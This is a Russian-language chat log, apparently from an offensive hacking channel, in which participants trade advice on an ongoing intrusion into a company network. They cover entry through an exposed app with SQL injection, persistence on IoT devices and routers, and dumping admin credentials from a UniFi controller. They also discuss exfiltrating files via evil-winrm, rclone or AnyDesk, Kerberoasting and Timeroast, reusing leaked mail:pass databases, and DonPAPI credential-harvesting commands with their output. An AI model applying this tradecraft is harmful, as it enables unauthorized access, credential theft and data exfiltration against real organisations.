Ну получается нет сегментации, у тебя ВПН?Да, сразу это сделал. Не знаю еще что можно проверить
Ну получается нет сегментации, у тебя ВПН?Да, сразу это сделал. Не знаю еще что можно проверить
Да, тут в целом как мне кажется довольно дыряво все, хоть и относительно большая контора, внутреннее приложение наружу торчит, а в нем до кучи еще и sqli, кароче я походу удачно зашел))Ну получается нет сегментации, у тебя ВПН?
Походу удачно)Да, тут в целом как мне кажется довольно дыряво все, хоть и относительно большая контора, внутреннее приложение наружу торчит, а в нем до кучи еще и sqli, кароче я походу удачно зашел))
host isolation понятно но весь впн перестает отвечать вот что не понятно. про Iot почитал пока ума не приложу где чем и к чему крепиться. если есть более обширная инфа - буду признателенhost isolation скорее всего, старайся на IoT, файрволе или роутере оставлять закреп с другим ип
а что интегрированно то? Из вкусного могут быть насики . Дамп бд надо смотреть и сопоставлять с сетьювсем привет. есть доступ к серверу ssh UniFi Controller. Что можно сделать? Я сдампил с бд учетки административные, но к АД не подошлии пароль в хэшированном виде.
rclone, scp консолька под винду. это если через консоль работать. Для гуи глянь может что то уже стоит на компе из софта. Иногда встречаются клиенты для ftp. Либо накатить туда что то вроде анидеска и ставь свою с интерфейсом.Есть доступ к двум хостам по winrm, как выкачать большие файлы к себе на сервер?! Я подключаюсь через evil-winrm.
А при этом они есть?всем привет,подскажите фиксится ли это (getuserspns.py no entries found
хэши снимал,но не сбручивал.Пассы очень сложные тами кто нибудь усмешно эксплуатировал Timeroast ?
Попробуй добавить новые пассы ,путем выгрузки паролей из общедоступных mail:pass базхэши снимал,но не сбручивал.Пассы очень сложные там
pipx run donpapi domain.com/forti:'password*'@192.168.161.11/23 --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o directorypipx run donpapi collect domain.com/forti:'password*'@192.168.161.11/23 --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o directoryпусть укажет ключами -d domain.com -u forti -p 'password*' -t 192.168.161.11/23pipx run donpapi domain.com/forti:'password*'@192.168.161.11/23 --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o directory
⚠ donpapi is already on your PATH and installed at /home/kali/.local/bin/donpapi. Downloading and running anyway.
usage: donpapi [-h] [-v] [-o DIRNAME] {collect,gui} ...
donpapi: error: argument action: invalid choice: 'domain.com/forti:'password*'@192.168.161.11/23' (choose from collect, gui)
pipx run donpapi collect domain.com/forti:'password*'@192.168.161.11/23 --no_vnc --no_remoteops --GetHashes --no_recent --no_sysadmins -o directory
donpapi is already on your PATH and installed at /home/kali/.local/bin/donpapi. Downloading and running anyway.
usage: donpapi [-h] [-v] [-o DIRNAME] {collect,gui} ...
donpapi: error: unrecognized arguments: domain.com/forti:'password*'@192.168.161.11/23
у товарища проблема. Кто-то сталкивался как пофиксить? Я зашел сам снял, без ошибок, при этом файлы у нас идентичные ничего не изменяли.
да, но редко, берешь хэши, брутишь имя тачек, далее пассы это маленькими буквами имя тачки без $ и бывало простые пассы Password1 и т.двсем привет,подскажите фиксится ли это (getuserspns.py no entries found)и кто нибудь усмешно эксплуатировал Timeroast ?
Может быть не совсем то, но, дома тестил такой кейс: ставил впн на роутер, подключался с другой сетки, цель была захват трафика с домашних устройств. Fping'ом к примеру все устройства находит, нмап так же без проблем сканит,Путем сканирования найти таргет-роутер со старой прошивкой, затем использовать эксплоит для проникновения, закрепиться, поставить свой впн, и уже его использовать
Нюансы? Подвохи?